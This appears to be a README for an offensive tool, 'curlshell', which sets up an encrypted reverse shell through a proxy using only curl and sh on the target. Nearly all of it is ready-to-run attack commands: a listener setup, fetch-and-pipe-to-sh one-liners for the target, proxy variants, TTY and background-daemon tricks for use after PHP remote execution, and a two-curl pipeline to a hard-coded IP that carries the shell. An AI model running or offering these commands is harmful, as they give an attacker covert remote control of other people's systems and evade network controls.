(Cloned from https://github.com/irsl/curlshell; slightly enhanced)
An encrypted reverse TCP shell through a proxy (using only cURL).
It allows an attacker to access a remote shell (sh) when the remote system can access the Internet via a Proxy only (or the filesystem is mounted read-only/noexec). The target only needs to have curl and sh installed. Python is not needed and no additonal tools are installed or deployed.
Generate a SSL Certificate (on your system; not the target):
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC"# Start your listener (your system)
./curlshell.py --certificate cert.pem --private-key key.pem --listen-port 8080# On the target:
curl -skfL https://1.2.3.4:8080 | sh./curlshell.py -x socks5h://5.5.5.5:1080 --certificate cert.pem --private-key key.pem --listen-port 8080 curl -x socks5h://5.5.5.5:1080 -skfL https://1.2.3.4:8080 | sh./curlshell.py -x http://5.5.5.5:3128 --certificate cert.pem --private-key key.pem --listen-port 8080 curl -x http://5.5.5.5:1080 -skfL https://1.2.3.4:8080 | sh./curlshell.py --listen-port 8080curl -sfL http://1.2.3.4:8080 | shTrick #1 - Spawn a TTY shell
stty intr undef susp undef;
./curlshell.py --shell "script -qc '/bin/bash -il' /dev/null" --listen-port 8080 ; stty intr ^C susp ^ZTrick #2 - Start the reverse shell as a daemon / background process
This is useful when you have remote execution via PHP:
# On the target:
(curl -sfL http://1.2.3.4:8080 | sh &>/dev/null &)The first cURL request pipes this into a target's shell:
exec curl -X POST -sN http://217.138.219.220:30903/input \
| sh 2>&1 | curl -s -T - http://217.138.219.220:30903/stdoutThis command starts two cURL processes and connects another shell's input and output these two cURL. HTTP's 'chunked transfer' (-T) does the rest.
More at https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.
Join us on Telegram: https://t.me/thcorg